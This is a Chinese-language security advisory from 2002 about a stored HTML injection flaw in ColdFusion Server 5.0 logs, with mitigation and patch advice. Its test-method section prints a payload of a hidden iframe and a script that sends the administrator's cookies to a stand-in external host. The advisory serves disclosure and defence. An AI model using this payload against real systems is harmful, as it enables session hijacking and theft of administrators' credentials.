Macromedia ColdFusion日志条目HTML注入漏洞
发布日期:2002-12-16
更新日期:2002-12-24
受影响系统:Allaire ColdFusion Server 5.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- RedHat Linux 7.0
- Sun Solaris 8.0
- SuSE Linux 7.0
描述:
BUGTRAQ ID:
6401
Macromedia ColdFusion是一款高效的网络应用服务器开发环境,具有很高的易用性和开发效率,基于标准的Java技术。可以与XML、Web Services和Microsoft .NET环境相集成。
ColdFusion没有充分的过滤日志条目中的恶意HTML代码,远程攻击者可以利用这个漏洞提交恶意数据触发异常,生成包含HTML代码的日志文件,当管理员查看时导致脚本执行。
当Coldfusion管理员允许用户通过用户的WEB浏览器查看日志时,会使用如下代码进行处理:
<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
SELECT * FROM Products
Where ProductId = #int(url.productid)#
</CFQUERY>
如果int函数获得值不是数字,它就会发生异常并写错误值application.log,如果攻击者提交的url.productid值包含恶意HTML或JavaScript代码,当管理员不小心查看日志的时候,就可以导致脚本代码在管理员浏览器上执行,导致基于Cookie认证的信息泄露或者进行更多恶意操作。
<*来源:KiLL CoLe (
killcole@yahoo.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104006589823109&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
KiLL CoLe (
killcole@yahoo.com)提供了如下测试方法:
提供url.productid值为:
<iframe name="frame1" width="0" height="0"></iframe>
<script>document.frame1.location="
http://www.domain.com/index.cfm?stealcookie="
+ document.cookie</script>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 使用文本浏览器查看日志。
厂商补丁:
Allaire
-------
macromedia已经补丁,但根据报告没有公开可下载,请联系供应商获得相关补丁。
http://www.macromedia.com/浏览次数:3209
严重程度:0(网友投票)